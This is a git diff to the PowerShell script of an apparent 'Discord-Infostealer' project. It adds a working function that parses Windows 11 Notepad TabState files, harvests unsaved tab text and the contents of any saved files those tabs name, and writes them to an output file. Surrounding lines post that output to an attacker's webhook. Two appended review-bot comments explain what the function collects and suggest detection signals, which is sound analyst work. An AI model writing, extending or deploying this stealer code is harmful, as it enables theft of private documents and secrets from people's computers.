diff --git a/Discord-Infostealer/main.ps1 b/Discord-Infostealer/main.ps1
index 1cd470f..d0d9363 100644
--- a/Discord-Infostealer/main.ps1
+++ b/Discord-Infostealer/main.ps1
@@ -169,6 +169,49 @@ else{ $GPS = "LAT = $Lat LONG = $Lon" } +function EnumNotepad{ + $appDataDir = [Environment]::GetFolderPath('LocalApplicationData') + $directoryRelative = "Packages\Microsoft.WindowsNotepad_*\LocalState\TabState" + $matchingDirectories = Get-ChildItem -Path (Join-Path -Path $appDataDir -ChildPath 'Packages') -Filter 'Microsoft.WindowsNotepad_*' -Directory + foreach ($dir in $matchingDirectories) { + $fullPath = Join-Path -Path $dir.FullName -ChildPath 'LocalState\TabState' + $listOfBinFiles = Get-ChildItem -Path $fullPath -Filter *.bin + foreach ($fullFilePath in $listOfBinFiles) { + if ($fullFilePath.Name -like '*.0.bin' -or $fullFilePath.Name -like '*.1.bin') { + continue + } + $seperator = ("=" * 60) + $SMseperator = ("-" * 60) + $seperator | Out-File -FilePath $outpath -Append + $filename = $fullFilePath.Name + $contents = [System.IO.File]::ReadAllBytes($fullFilePath.FullName) + $isSavedFile = $contents[3] + if ($isSavedFile -eq 1) { + $lengthOfFilename = $contents[4] + $filenameEnding = 5 + $lengthOfFilename * 2 + $originalFilename = [System.Text.Encoding]::Unicode.GetString($contents[5..($filenameEnding - 1)]) + "Found saved file : $originalFilename" | Out-File -FilePath $outpath -Append + $filename | Out-File -FilePath $outpath -Append + $SMseperator | Out-File -FilePath $outpath -Append + Get-Content -Path $originalFilename -Raw | Out-File -FilePath $outpath -Append + } else { + "Found an unsaved tab!" 
| Out-File -FilePath $outpath -Append + $filename | Out-File -FilePath $outpath -Append + $SMseperator | Out-File -FilePath $outpath -Append + $filenameEnding = 0 + $delimeterStart = [array]::IndexOf($contents, 0, $filenameEnding) + $delimeterEnd = [array]::IndexOf($contents, 1, $filenameEnding) + + $fileMarker = $contents[($delimeterStart + 2)..($delimeterEnd - 1)] + $fileMarker = -join ($fileMarker | ForEach-Object { [char]$_ }) + + $originalFileContents = [System.Text.Encoding]::Unicode.GetString($contents[($delimeterEnd + 4 + $fileMarker.Length)..($contents.Length - 6)]) + $originalFileContents | Out-File -FilePath $outpath -Append + } + "`n" | Out-File -FilePath $outpath -Append + } + } +} $infomessage = " ================================================================================================================================== @@ -275,6 +318,13 @@ $infomessage | Out-File -FilePath $outpath -Encoding ASCII -Append $infomessage1 | Out-File -FilePath $outpath -Encoding ASCII -Append $infomessage2 | Out-File -FilePath $outpath -Encoding ASCII -Append +if ($OSString -like '*11*'){ + EnumNotepad +} +else{ + "no notepad tabs (windows 10 or below)" | Out-File -FilePath $outpath -Encoding ASCII -Append +} + $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = "$infomessage1"} | ConvertTo-Json Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys
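Review bot: `EnumNotepad` carries no comment saying what it collects, which matters to anyone triaging this sample: it reads the Notepad session-state files under `Packages\Microsoft.WindowsNotepad_*\LocalState\TabState` and appends both the text of unsaved tabs and the contents of any saved file those entries name to `$outpath`. A header such as `# Collects Notepad TabState (*.bin) contents, including unsaved tab text, into $outpath` would make that explicit. For detection, reads of that TabState directory by any process other than Notepad itself (here a PowerShell host) are a strong signal, as is `Get-Content` on paths taken from those files. Exposure presumably shrinks when Notepad is set to start a new session instead of restoring the previous one, since unsaved text should then not persist in TabState; confirm this on the deployed build.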
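Review bot: The new `if ($OSString -like '*11*')` branch is undocumented, and `$OSString` is assigned outside this hunk, so the only thing visible here is that the Notepad collection runs when that string contains `11`. A comment like `# Notepad TabState is collected only when $OSString matches *11*` would record the condition. For analysts this means a detonation on Windows 10 writes "no notepad tabs" and never touches TabState, so file-access detections for this behaviour should be validated on a Windows 11 image. The context lines after the branch post to `$hookurl` with `Invoke-RestMethod`, which makes outbound webhook POSTs from a PowerShell process the network-side indicator to pair with the file reads.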